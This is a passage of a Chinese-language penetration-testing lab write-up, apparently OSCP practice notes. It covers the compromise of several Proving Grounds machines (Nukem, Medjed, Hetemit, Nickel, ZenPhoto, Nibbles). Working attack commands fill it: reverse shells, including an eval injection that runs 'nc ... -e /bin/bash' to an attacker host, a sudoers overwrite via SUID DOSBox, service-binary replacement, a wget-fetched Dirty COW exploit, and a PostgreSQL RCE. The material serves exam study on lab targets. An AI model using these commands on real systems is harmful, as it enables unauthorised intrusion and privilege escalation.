\u4f7f\u7528 exploit<\/a> \u4fee\u6539 revshell IP Port <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nukem]\n\u2514\u2500$ rlwrap nc -lvnp 5000\nlistening on [any] 5000 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.105] 59552\nbash: cannot set terminal process group (350): Inappropriate ioctl for device\nbash: no job control in this shell\n[http@nukem simple-file-list]$ python3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\n[http@nukem simple-file-list]$ cd \/home\ncd \/home\n[http@nukem home]$ ls\nls\ncommander\n[http@nukem home]$ cd commander\ncd commander\n[http@nukem commander]$ cat local.txt\ncat local.txt\n650e1ccaa35f92bb7f6903dc8c80a5e2\n[http@nukem commander]$ <\/code><\/pre>\n\n\n\n
privilege escalation – setuid <\/h3>\n\n\n\n
\u6aa2\u67e5 SUID \u767c\u73fe\u6709 dosbox \u53ef\u4ee5\u5229\u7528\uff0c\u53c3\u8003 <\/a> \u76ee\u524d\u62ff\u5230\u7684\u8eab\u5206\u662f http \uff0c\u4fee\u6539 \/etc\/sudoers \u8b93 http \u53ef\u4ee5\u7121\u5bc6\u78bc\u7528 sudo \u53bb\u57f7\u884c\u6307\u4ee4<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
[http@nukem simple-file-list]$ DATA=\"http ALL=NOPASSWD:ALL\"\nDATA=\"http ALL=NOPASSWD:ALL\"\n[http@nukem simple-file-list]$ LFILE='\\etc\\sudoers'\nLFILE='\\etc\\sudoers'\n[http@nukem simple-file-list]$ \/usr\/bin\/dosbox -c 'mount c \/' -c \"echo $DATA >>c:$LFILE\" -c exit\n<x -c 'mount c \/' -c \"echo $DATA >>c:$LFILE\" -c exit\nDOSBox version 0.74-3\nCopyright 2002-2019 DOSBox Team, published under GNU GPL.\n---\nALSA lib confmisc.c:767:(parse_card) cannot find card '0'\nALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory\nALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings\nALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory\nALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name\nALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory\nALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory\nALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default\nCONFIG: Using default settings. Create a configfile to change them\nMIXER:Can't open audio: No available audio device , running in nosound mode.\nALSA:Can't subscribe to MIDI port (65:0) nor (17:0)\nMIDI:Opened device:none\nSHELL:Redirect output to c:\\etc\\sudoers\n[http@nukem simple-file-list]$ sudo su\nsudo su\n[root@nukem simple-file-list]# cat \/root\/proof.txt\ncat \/root\/proof.txt\nd6586a7bfffcaf473ba5f38b00b3ca60\n[root@nukem simple-file-list]# <\/code><\/pre>\n\n\n\n
Medjed<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.127<\/strong><\/strong><\/td>TCP:135,139,445,3306,5040,8000,30021,33033,44330,45332,45443<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
8000 port \u8dd1\u4e00\u500b\uff0c\u5f85\u8a2d\u5b9a\u7684\u9801\u9762\uff0c\u96a8\u4fbf\u586b\u4e00\u586b\uff0c\u4e4b\u5f8c\u5c31\u80fd\u9ede\u9078 Web-File-Server \u3002\u80fd\u8a2a\u554f\u5168\u90e8 windows \u7684\u8cc7\u6599\u593e(\u542b administrator)<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Initial Access – file upload to RCE<\/h3>\n\n\n\n
\u76f4\u63a5\u4e0a\u50b3 webshell \u4e0a\u53bb xampp \u5b58\u653e\u7db2\u7ad9\u7a0b\u5f0f\u7684\u8cc7\u6599\u593e\u3002xampp \u57f7\u884c\u7684\u7aef\u53e3\u5728 45443 <\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Medjed]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.127] 50011\nwhoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                          State   \n============================= ==================================== ========\nSeShutdownPrivilege           Shut down the system                 Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking             Enabled \nSeUndockPrivilege             Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set       Disabled\nSeTimeZonePrivilege           Change the time zone                 Disabled\nPS C:\\xampp\\htdocs> cd ~\nPS C:\\Users\\Jerren> type desktop\\local.txt\n2b07982d3503be5f449a0fe11e275415\nPS C:\\Users\\Jerren> <\/code><\/pre>\n\n\n\n
privilege escalation<\/h3>\n\n\n\n
\u7528 PowerUp.ps1 \u6aa2\u67e5\u767c\u73fe\uff0c\u5c0d bd.exe \u6709 modify \u6b0a\u9650<\/p>\n\n\n\n
PS C:\\Users\\Jerren> powershell -ep bypass\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nTry the new cross-platform PowerShell https:\/\/aka.ms\/pscore6\n\nPS C:\\Users\\Jerren> \nPS C:\\Users\\Jerren> . .\\PowerUp.ps1\nPS C:\\Users\\Jerren> Invoke-AllChecks\n\n\n\nServiceName                     : bd\nPath                            : \"C:\\bd\\bd.exe\"\nModifiableFile                  : C:\\bd\\bd.exe\nModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}\nModifiableFileIdentityReference : NT AUTHORITY\\Authenticated Users\nStartName                       : LocalSystem\nAbuseFunction                   : Install-ServiceBinary -Name 'bd'\nCanRestart                      : False\nName                            : bd\nCheck                           : Modifiable Service Files<\/code><\/pre>\n\n\n\n
\u751f\u6210\u4e00\u500b revshell exe \uff0c\u4e26\u547d\u540d\u70ba bd.exe \uff0c\u5728\u91cd\u555f <\/p>\n\n\n\n
PS C:\\bd> cp \/\/192.168.45.228\/share\/exp.exe .\nPS C:\\bd> mv exp.exe bd.exe\n\ndir\nPS C:\\bd> \n\n    Directory: C:\\bd\n\n\nMode                 LastWriteTime         Length Name                                                                 \n----                 -------------         ------ ----                                                                 \nd-----         11\/3\/2020  12:29 PM                applications                                                         \nd-----         11\/3\/2020  12:29 PM                cache                                                                \nd-----         11\/3\/2020  12:29 PM                cmsdocs                                                              \nd-----         11\/3\/2020  12:29 PM                data                                                                 \nd-----         11\/3\/2020  12:29 PM                themes                                                               \nd-----          8\/1\/2024  10:49 PM                trace                                                                \n-a----         11\/3\/2020  12:29 PM             38 bd.conf                                                              \n-a----         11\/3\/2020  12:29 PM            259 bd.dat                                                               \n-a----         6\/11\/2025   4:34 AM           7168 bd.exe                                                               \n-a----         4\/26\/2013   5:55 PM        1661648 bd.exe.bak                                                           \n-a----         6\/12\/2011   4:49 PM            207 bd.lua                                                               \n-a----         4\/26\/2013   5:55 PM         912033 bd.zip                                                               \n-a----         6\/14\/2012  12:21 PM          33504 bdctl.exe                                                            \n-a----         6\/11\/2025   4:12 AM            151 dbcfg.dat                                                            \n-a----         6\/11\/2025   4:12 AM            135 drvcnstr.dat                                                         \n-a----         6\/11\/2025   4:12 AM             28 emails.dat                                                           \n-a----         12\/3\/2010   4:52 PM           5139 install.txt                                                          \n-a----        10\/26\/2010   4:38 PM         421200 msvcp100.dll                                                         \n-a----        10\/26\/2010   4:38 PM         770384 msvcr100.dll                                                         \n-a----         2\/18\/2013  10:39 PM         240219 non-commercial-license.rtf                                           \n-a----          8\/1\/2024  10:49 PM              6 pidfile                                                              \n-a----         4\/26\/2013   5:50 PM          16740 readme.txt                                                           \n-a----         6\/11\/2025   4:12 AM            808 roles.dat                                                            \n-a----         6\/14\/2012  12:21 PM         383856 sqlite3.exe                                                          \n-a----         6\/11\/2025   4:12 AM             78 tuncnstr.dat                                                         \n-a----         11\/3\/2020  12:29 PM         133107 Uninstall.exe                                                        \n-a----         6\/11\/2025   4:12 AM            461 user.dat                                                             \n\n\nPS C:\\bd> shutdown -r -t 0\nPS C:\\bd> <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg]\n\u2514\u2500$ rlwrap nc -lvnp 6969 \nlistening on [any] 6969 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.127] 49668\nMicrosoft Windows [Version 10.0.19042.1387]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\WINDOWS\\system32>whoami\nwhoami\nnt authority\\system\n\nC:\\WINDOWS\\system32>type c:\\users\\administrator\\desktop\\proof.txt\ntype c:\\users\\administrator\\desktop\\proof.txt\nd6607916b6fce1744f4c05a055d1d5c6\n\nC:\\WINDOWS\\system32><\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Hetemit<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.117<\/strong><\/td>TCP:21,22,80,139,445,18000,50000<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u5728 50000 port \u7528 Python 3.6.8 \u8dd1\u7684\u7db2\u7ad9 API \u7aef\u9ede\u6709 command injection\uff0c\u731c\u6e2c\u61c9\u8a72\u662f\u7528 eval \u5728\u57f7\u884c <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ curl -X POST -d \"code=8*9\" http:\/\/192.168.162.117:50000\/verify\n72                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ curl -X POST -d \"code=id\" http:\/\/192.168.162.117:50000\/verify \n<built-in function id>                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ curl -X POST -d \"code=8*9\" http:\/\/192.168.162.117:50000\/verify\n72                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ curl -X POST -d \"code=8%2B9\" http:\/\/192.168.162.117:50000\/verify\n17 \n\n---\n\u4f7f\u7528 ipython3 \u53bb\u6a21\u64ec\nIn [15]: code='id'\n\nIn [16]: eval(code)\nOut[16]: <function id(obj, \/)>\n\nIn [17]: code='8*9'\n\nIn [18]: eval(code)\nOut[18]: 72\n\nIn [19]:                                                                                                                       <\/code><\/pre>\n\n\n\n
Initial Access – command injection<\/h3>\n\n\n\n
\u56e0\u70ba\u8f38\u51fa\u7d50\u679c\u90fd\u662f 0 \uff0c\u7528 ping \u770b\u770b\u6307\u4ee4\u662f\u5426\u6709\u5728\u57f7\u884c<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ curl -X POST -d \"code=__import__('os').system('ping -c 4 192.168.45.228')\" http:\/\/192.168.162.117:50000\/verify\n0    \n\n---\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ sudo tcpdump -i tun0 icmp\ntcpdump: verbose output suppressed, use -v[v]... for full protocol decode\nlistening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes\n03:27:15.567447 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 1, length 64\n03:27:15.567996 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 1, length 64\n03:27:16.567896 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 2, length 64\n03:27:16.567912 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 2, length 64\n03:27:17.568610 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 3, length 64\n03:27:17.568625 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 3, length 64\n03:27:18.569436 IP 192.168.162.117 > 192.168.45.228: ICMP echo request, id 2357, seq 4, length 64\n03:27:18.569452 IP 192.168.45.228 > 192.168.162.117: ICMP echo reply, id 2357, seq 4, length 64\n<\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ rlwrap nc -lvnp 18000\nlistening on [any] 18000 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 41052\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\n[cmeeks@hetemit restjson_hetemit]$ ls\nls\napp.py  __pycache__\n[cmeeks@hetemit restjson_hetemit]$ cd ~\ncd ~\n[cmeeks@hetemit ~]$ ls\nls\nlocal.txt  register_hetemit  restjson_hetemit  share\n[cmeeks@hetemit ~]$ cat local.txt\ncat local.txt\nbb223682a73fa4645b957710a15fb308\n[cmeeks@hetemit ~]$ <\/code><\/pre>\n\n\n\n
privilege escalation<\/h3>\n\n\n\n
sudo -l \u767c\u73fe\u6709 \/sbin\/halt, \/sbin\/reboot, \/sbin\/poweroff \u9019\u4e9b\u6b0a\u9650\u53ef\u4ee5\u7528\uff0c\u53c3\u8003 \u9019\u7bc7<\/a> \u63d0\u6b0a\u65b9\u6cd5\u3002\u9700\u8981\u7de8\u8f2f\u6587\u4ef6\u6240\u4ee5\u8981\u62ff\u5230\u5b8c\u6574\u53ef\u4ee5\u4e92\u52d5\u7684 shell <\/p>\n\n\n\n
nc -lvnp PORT (\u4e0d\u80fd\u7528 rlwarp\nctrl+z\nstty raw -echo;fg<\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ nc -lvnp 18000\nlistening on [any] 18000 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 41018\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\n[cmeeks@hetemit restjson_hetemit]$ cd ~\ncd ~\n[cmeeks@hetemit ~]$ sudo -l\nsudo -l\nMatching Defaults entries for cmeeks on hetemit:\n    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,\n    env_reset, env_keep=\"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\",\n    env_keep+=\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\",\n    env_keep+=\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\",\n    env_keep+=\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\",\n    env_keep+=\"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\",\n    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\n\nUser cmeeks may run the following commands on hetemit:\n    (root) NOPASSWD: \/sbin\/halt, \/sbin\/reboot, \/sbin\/poweroff\n[cmeeks@hetemit ~]$ ^Z\nzsh: suspended  nc -lvnp 18000\n                                                                                                                                                                                                                                                            \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ stty raw -echo;fg\n[1]  + continued  nc -lvnp 18000\n                                pwd\n\/home\/cmeeks\n[cmeeks@hetemit ~]$ <\/code><\/pre>\n\n\n\n
\u7de8\u8f2f \/etc\/systemd\/system\/pythonapp.service \u628a\u57f7\u884c 50000 port service \u7684 user \u6539\u6210 root<\/p>\n\n\n\n
[Unit]\nDescription=Python App\nAfter=network-online.target\n\n[Service]\nType=simple\nWorkingDirectory=\/home\/cmeeks\/restjson_hetemit\nExecStart=flask run -h 0.0.0.0 -p 50000\nTimeoutSec=30\nRestartSec=15s\nUser=root\nExecReload=\/bin\/kill -USR1 $MAINPID\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target<\/code><\/pre>\n\n\n\n
\u518d\u7528\u4e00\u6a23\u7684\u624b\u6cd5\u6253\u4e00\u6b21<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ curl -X POST -d \"code=__import__('os').system('nc 192.168.45.228 80 -e \/bin\/bash')\" http:\/\/192.168.162.117:50000\/verify\n\n---\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hetemit]\n\u2514\u2500$ rlwrap nc -lvnp 80   \nlistening on [any] 80 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.117] 51908\nid\nuid=0(root) gid=0(root) groups=0(root)\ncat \/root\/proof.txt\ne95d6f9049dffa91d565fb7b5abc1982\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Nickel<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.99<\/strong><\/td>TCP:21,22,80,135,139,445,3389,5040,7680,8089,33333<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u5728 8089 port \u5176\u4e2d\u9ede\u9078\u5176\u4e2d\u4e00\u500b\u6309\u9215\uff0c\u53ef\u4ee5\u770b\u5230\u6703\u5411 IP:33333 \u767c\u8acb\u6c42<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u76f4\u63a5\u7528 GET \u6703\u6536\u5230<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nickel]\n\u2514\u2500$ curl http:\/\/192.168.162.99:33333\/list-running-procs                                \n\n<p>Cannot \"GET\" \/list-running-procs<\/p>   <\/code><\/pre>\n\n\n\n
\u76f4\u63a5\u7528 POST \u6703\u9700\u8981\u8a2d\u5b9a Content-Length\uff0c\u6700\u5f8c\u7528\u5e36\u6709 Content-Length \u7684 header \u53bb\u8a2a\u554f<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nickel]\n\u2514\u2500$ curl -X POST http:\/\/192.168.162.99:33333\/list-running-procs  -H \"Content-Length: 0\"\n\n\nname        : System Idle Process\ncommandline : \n\nname        : System\ncommandline : \n\nname        : Registry\ncommandline : \n\nname        : smss.exe\ncommandline : \n\nname        : csrss.exe\ncommandline : \n\nname        : wininit.exe\ncommandline : \n\nname        : csrss.exe\ncommandline : \n\nname        : winlogon.exe\ncommandline : winlogon.exe\n\nname        : services.exe\ncommandline : \n\nname        : lsass.exe\ncommandline : C:\\Windows\\system32\\lsass.exe\n\nname        : fontdrvhost.exe\ncommandline : \"fontdrvhost.exe\"\n\nname        : fontdrvhost.exe\ncommandline : \"fontdrvhost.exe\"\n\nname        : dwm.exe\ncommandline : \"dwm.exe\"\n\nname        : powershell.exe\ncommandline : powershell.exe -nop -ep bypass C:\\windows\\system32\\ws80.ps1\n\nname        : conhost.exe\ncommandline : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\n\nname        : Memory Compression\ncommandline : \n\nname        : cmd.exe\ncommandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p \n              \"Tm93aXNlU2xvb3BUaGVvcnkxMzkK\" --server nickel-dev --protocol ssh\n\nname        : powershell.exe\ncommandline : powershell.exe -nop -ep bypass C:\\windows\\system32\\ws8089.ps1\n\nname        : powershell.exe\ncommandline : powershell.exe -nop -ep bypass C:\\windows\\system32\\ws33333.ps1\n\nname        : FileZilla Server.exe\ncommandline : \"C:\\Program Files (x86)\\FileZilla Server\\FileZilla Server.exe\"\n\nname        : sshd.exe\ncommandline : \"C:\\Program Files\\OpenSSH\\OpenSSH-Win64\\sshd.exe\"\n\nname        : VGAuthService.exe\ncommandline : \"C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe\"\n\nname        : vm3dservice.exe\ncommandline : C:\\Windows\\system32\\vm3dservice.exe\n\nname        : vmtoolsd.exe\ncommandline : \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"\n\nname        : vm3dservice.exe\ncommandline : vm3dservice.exe -n\n\nname        : dllhost.exe\ncommandline : C:\\Windows\\system32\\dllhost.exe \/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}\n\nname        : WmiPrvSE.exe\ncommandline : C:\\Windows\\system32\\wbem\\wmiprvse.exe\n\nname        : msdtc.exe\ncommandline : C:\\Windows\\System32\\msdtc.exe\n\nname        : LogonUI.exe\ncommandline : \"LogonUI.exe\" \/flags:0x2 \/state0:0xa3957055 \/state1:0x41c64e6d\n\nname        : conhost.exe\ncommandline : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\n\nname        : conhost.exe\ncommandline : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\n\nname        : conhost.exe\ncommandline : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\n\nname        : WmiPrvSE.exe\ncommandline : C:\\Windows\\system32\\wbem\\wmiprvse.exe\n\nname        : MicrosoftEdgeUpdate.exe\ncommandline : \"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" \/c\n\nname        : SgrmBroker.exe\ncommandline : \n\nname        : SearchIndexer.exe\ncommandline : C:\\Windows\\system32\\SearchIndexer.exe \/Embedding\n\nname        : CompatTelRunner.exe\ncommandline : C:\\Windows\\system32\\compattelrunner.exe\n\nname        : conhost.exe\ncommandline : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\n\nname        : CompatTelRunner.exe\ncommandline : C:\\Windows\\system32\\compattelrunner.exe -maintenance\n\nname        : conhost.exe\ncommandline : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\n\nname        : WmiApSrv.exe\ncommandline : C:\\Windows\\system32\\wbem\\WmiApSrv.exe<\/code><\/pre>\n\n\n\n
\u5176\u4e2d\u767c\u73fe commandline \u6709\u4e00\u884c\u6709 ssh \u7684 username & password<\/p>\n\n\n\n
Initial Access – use leak info ssh login machine<\/h3>\n\n\n\n
\u5bc6\u78bc\u7528 base64 decode \u5f8c\u5f97\u5230 NowiseSloopTheory139\uff0c\u7528 ariah\/NowiseSloopTheory139 \u767b\u5165SSH<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nickel]\n\u2514\u2500$ ssh ariah@192.168.162.99                            \nThe authenticity of host '192.168.162.99 (192.168.162.99)' can't be established.\nED25519 key fingerprint is SHA256:e25NU8Sljo45nzplpVGugSC5xB5vToeqoHPYJkQqbPU.\nThis host key is known by the following other names\/addresses:\n    ~\/.ssh\/known_hosts:57: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.162.99' (ED25519) to the list of known hosts.\nariah@192.168.162.99's password: \nMicrosoft Windows [Version 10.0.18362.1016]         \n(c) 2019 Microsoft Corporation. All rights reserved.\n                                                    \nariah@NICKEL C:\\Users\\ariah>type desktop\\local.txt  \n5f286730b01157a6b18934327ce63538\n                                \nariah@NICKEL C:\\Users\\ariah>  <\/code><\/pre>\n\n\n\n
privilege escalation<\/h3>\n\n\n\n
\u5728 C:\\ftp \u767c\u73fe\u4e00\u500b\u6587\u4ef6 Infrastructure.pdf\uff0c\u4e26\u4e14\u8a2d\u6709\u5bc6\u78bc\u3002\u4f7f\u7528 pdf2john \u4e26\u7834\u89e3 hash \u5f97\u5230\u5bc6\u78bc ariah4168\u3002\u67e5\u770b\u6587\u4ef6\u53ef\u4ee5\u767c\u73fe\u6709\u4e00\u8655\u6709 command \u7684 endpoint <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u5c07\u5df2\u7d93\u62ff\u5230\u7684 user (ariah) \u52a0\u9032\u53bb administrators group <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nickel]\n\u2514\u2500$ curl \"http:\/\/192.168.162.99\/?net%20localgroup%20administrators%20ariah%20\/add\"\n<!doctype html><html><body>dev-api started at 2024-08-03T05:08:16\n\n        <pre>The command completed successfully.\n\n<\/pre>\n<\/body><\/html><\/code><\/pre>\n\n\n\n
RDP \u9032\u53bb\u62ff proof.txt<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
ZenPhoto<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.41<\/strong><\/td>TCP:22,23,80,3306<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u7206\u76ee\u9304\u627e\u5230 \/test \uff0c\u904b\u884c\u8457 zenphoto \uff0c\u6709 RCE \u6f0f\u6d1e<\/p>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/ZenPhoto]\n\u2514\u2500$ php 18083 192.168.162.41 \/test\/\n\n+-----------------------------------------------------------+\n| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |\n+-----------------------------------------------------------+\n\nzenphoto-shell# id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\nzenphoto-shell# ls \/home\nlocal.txt\n\nzenphoto-shell# cat \/home\/local.txt\n72a5777ab52bd15079a3e3e02436c1e2\n\nzenphoto-shell# <\/code><\/pre>\n\n\n\n
privilege escalation<\/h3>\n\n\n\n
\u7528 lineas \u770b\u5230\u6709 dirtycow \u53ef\u4ee5\u6253\uff0c\u7528 dirty.c<\/a>
Proof<\/strong><\/p>\n\n\n\n
www-data@offsecsrv:\/tmp$ wget 192.168.45.228:8000\/dirty.c\nwget 192.168.45.228:8000\/dirty.c\n--2025-06-11 10:19:52--  http:\/\/192.168.45.228:8000\/dirty.c\nConnecting to 192.168.45.228:8000... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 4815 (4.7K) [text\/x-csrc]\nSaving to: `dirty.c'\n\n100%[======================================>] 4,815       --.-K\/s   in 0s      \n\n2025-06-11 10:19:53 (21.1 MB\/s) - `dirty.c' saved [4815\/4815]\n\nwww-data@offsecsrv:\/tmp$ gcc -pthread dirty.c -o dirty -lcrypt\ngcc -pthread dirty.c -o dirty -lcrypt\nwww-data@offsecsrv:\/tmp$ .\/dirty\n.\/dirty\n\/etc\/passwd successfully backed up to \/tmp\/passwd.bak\nPlease enter the new password: pwn\n\nComplete line:\nfirefart:fiY9IH9EEmntk:0:0:pwned:\/root:\/bin\/bash\n\nmmap: b77a2000\n\n\nptrace 0\nDone! Check \/etc\/passwd to see if the new user was created.\nYou can log in with the username 'firefart' and the password 'pwn'.\n\n\nDON'T FORGET TO RESTORE! $ mv \/tmp\/passwd.bak \/etc\/passwd\nwww-data@offsecsrv:\/tmp$ \nwww-data@offsecsrv:\/tmp$ madvise 0\n\nDone! Check \/etc\/passwd to see if the new user was created.\nYou can log in with the username 'firefart' and the password 'pwn'.\n\n\nDON'T FORGET TO RESTORE! $ mv \/tmp\/passwd.bak \/etc\/passwd\n\n\nwww-data@offsecsrv:\/tmp$ su firefart\nsu firefart\nPassword: pwn\n\nfirefart@offsecsrv:\/tmp# cat \/root\/proof.txt\ncat \/root\/proof.txt\n9a1b4905fb1301bf61cd99d581ead841\nfirefart@offsecsrv:\/tmp# <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Nibbles<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.47<\/td>TCP:21,22,80,5437<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
postgres enumeration<\/strong><\/p>\n\n\n\n
weak password postgres\/postgres \u767b\u5165\u6210\u529f\uff0c\u904b\u884c\u7684\u7248\u672c\u6709 RCE \u6f0f\u6d1e<\/p>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u4f7f\u7528 exploit<\/a> <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nibbles]\n\u2514\u2500$ python3 50847 -i 192.168.162.47 -p 5437 -U postgres -P postgres -c id\n\n[+] Connecting to PostgreSQL Database on 192.168.162.47:5437\n[+] Connection to Database established\n[+] Checking PostgreSQL version\n[+] PostgreSQL 11.7 is likely vulnerable\n[+] Creating table _c5022142c68aa9060a84a6dff8fb4534\n[+] Command executed\n\nuid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)\n\n[+] Deleting table _c5022142c68aa9060a84a6dff8fb4534<\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
